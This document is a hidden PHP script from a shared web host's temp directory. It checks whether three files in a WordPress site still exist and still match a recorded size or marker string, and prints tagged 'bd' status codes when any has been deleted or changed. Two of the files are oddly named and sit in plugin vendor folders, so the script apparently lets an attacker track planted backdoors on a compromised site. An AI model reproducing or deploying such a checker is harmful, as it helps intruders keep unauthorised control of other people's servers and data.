File: /home/ic3/.cagefs/tmp/.hld
<?php $r = '/home/ic3/domains/ic3.info/private_html'; $x = ["/wp-includes/class-wp-error.php"=>"bd@@263487957@@WeLQSd",
"/wp-content/plugins/foxtool/link/google-api/vendor/google/apiclient/src/Google/AccessToken/alertpay.php"=>"bd@@263488781@@2325",
"/wp-content/plugins/foxtool/link/google-api/vendor/google/apiclient-services/src/Google/Service/modifyalb.php"=>"bd@@262364187@@891"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');